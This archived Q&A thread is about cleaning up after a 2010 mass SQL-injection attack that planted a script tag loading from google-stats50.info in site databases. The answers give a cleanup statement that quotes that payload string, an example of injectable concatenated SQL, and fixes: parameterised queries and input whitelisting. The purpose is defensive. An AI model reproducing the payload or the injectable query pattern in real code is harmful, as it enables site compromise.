ansaurus

Question

Answer 1

+3 A:

Just happened to us as well. Almost every record in the database.

The best bet is to do the following: (we have just done this successfully)

UPDATE [mytable] set [column] =
  REPLACE([column],
          '&lt;/title&gt;&lt;script src=http://google-stats50.info/ur.php&amp;gt;',
          '')

That line will remove the script from each field. You will have to manually check the fields though and change the UPDATE statement to suit.

I am taking a guess that every one of you has a form on your website with a submit button. I am also guessing that the forms action involves a sql statement with concatenated sql?

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES ('" & \
                           name & "', '" & email & "', '" & enquiry & "');"

If this is the case, you got SQL injection hacked and you should probably change all statements that use this syntax to "parameterised queries"

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);"

sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz

Hopefully this helps..

Simon 2010-09-21 14:26:55

@badp: Thanks for tidying up :)

Simon 2010-09-21 15:33:52

Just happened again. This time google-stats49...........and a lot worse. It starts opening windows and throwing out download buttons.

Simon 2010-09-22 08:02:34

Answer 2

+1 A:

We got the same problem this morning. classic case of sql injection: you don't seem to check the parameters you got via URL. take a look to the webserver access logs - you will see update statements!

Stefan 2010-09-21 14:30:35

We got exactly the same probleme this morning. Some answer tell me that i am not sure if is an code attack or attack directly the sql server because .net web site and asp classic web site was attack

Cédric Boivin 2010-09-21 14:37:13

Answer 3

+1 A:

Classic XSS attack. You should be checking your inputs for HTML tags and removing them. If you are allowing people to post HTML tags then you should use a whitelist for allowed tags (and allowed tag attributes, so they can't do "onClick", for example) rather than trying to block ones you can think of that might cause trouble.

ishnid 2010-09-21 14:35:36

The web site do not contain forms

Cédric Boivin 2010-09-21 14:38:08

+1 for recommending a whitelist.

Jordan Reiter 2010-09-21 14:57:57

Answer 4

+1 A:

I've fixed a similar hack recently, every .asp, .js and .html file on the infected server had an extra script included, but the database was normal. In that case the hack was done via FTP, the password was not strong enough. Maybe something similar happened to you?

I've fixed it with a find-and-replace-all in a text-editor supporting multiple documents at once. (notepad++)

Willem 2010-09-21 14:48:14

In my case the database are infected, the page is render from the database content

Cédric Boivin 2010-09-21 14:56:09

ansaurus

tags:

views:

answers:

Need help with this XSS attack

related questions